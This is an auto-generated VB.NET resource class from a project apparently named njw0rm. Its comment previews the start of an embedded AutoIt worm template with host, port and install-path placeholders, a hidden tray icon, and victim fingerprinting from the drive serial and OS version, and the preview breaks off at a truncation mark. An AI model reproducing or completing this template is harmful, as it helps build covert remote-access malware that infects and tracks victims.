'------------------------------------------------------------------------------
' <auto-generated>
'     This code was generated by a tool.
'     Runtime Version:2.0.50727.4961
'
'     Changes to this file may cause incorrect behavior and will be lost if
'     the code is regenerated.
' </auto-generated>
'------------------------------------------------------------------------------

Option Strict On
Option Explicit On

Imports System

Namespace My.Resources
    
    'This class was auto-generated by the StronglyTypedResourceBuilder
    'class via a tool like ResGen or Visual Studio.
    'To add or remove a member, edit your .ResX file then rerun ResGen
    'with the /str option, or rebuild your VS project.
    '''<summary>
    '''  A strongly-typed resource class, for looking up localized strings, etc.
    '''</summary>
    <Global.System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0"),  _
     Global.System.Diagnostics.DebuggerNonUserCodeAttribute(),  _
     Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(),  _
     Global.Microsoft.VisualBasic.HideModuleNameAttribute()>  _
    Friend Module Resources
        
        Private resourceMan As Global.System.Resources.ResourceManager
        
        Private resourceCulture As Global.System.Globalization.CultureInfo
        
        '''<summary>
        '''  Returns the cached ResourceManager instance used by this class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend ReadOnly Property ResourceManager() As Global.System.Resources.ResourceManager
            Get
                If Object.ReferenceEquals(resourceMan, Nothing) Then
                    Dim temp As Global.System.Resources.ResourceManager = New Global.System.Resources.ResourceManager("njw0rm.Resources", GetType(Resources).Assembly)
                    resourceMan = temp
                End If
                Return resourceMan
            End Get
        End Property
        
        '''<summary>
        '''  Overrides the current thread's CurrentUICulture property for all
        '''  resource lookups using this strongly typed resource class.
        '''</summary>
        <Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)>  _
        Friend Property Culture() As Global.System.Globalization.CultureInfo
            Get
                Return resourceCulture
            End Get
            Set
                resourceCulture = value
            End Set
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to #comments-start
        '''njw0rm  : v0.3
        '''Write By: njq8
        '''#comments-end
        '''
        '''#NoTrayIcon
        '''#include &lt;Misc.au3&gt;
        '''#include &lt;string.au3&gt;
        '''#Include &lt;File.au3&gt;
        '''#Include &lt;Array.au3&gt;
        '''
        '''Local $Host =  &quot;&lt;host&gt;&quot;
        '''Local $PORT = &lt;port&gt;
        '''Local $EXE  = &quot;&lt;exe&gt;&quot;
        '''Local $DIR  = EnvGet(&quot;&lt;dir&gt;&quot;) &amp; &quot;\&quot;
        '''Local $VR  = &quot;0.3.1&quot;
        '''Local $name  =  &quot;&lt;name&gt;&quot;
        '''$name &amp;=   &quot;_&quot; &amp; Hex( driveGetSerial( @HomeDrive))
        '''$OS=    @OSVersion &amp; &quot; &quot;&amp; @OSArch  &amp; &quot; &quot; &amp; StringReplace( @OSServicePack,&quot;Service Pack &quot;,&quot;SP&quot;)
        '''if StringInStr( $OS,&quot;SP&quot;)&lt;1 then $OS &amp;=&quot;S [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property src_txt() As String
            Get
                Return ResourceManager.GetString("src_txt", resourceCulture)
            End Get
        End Property
    End Module
End Namespace
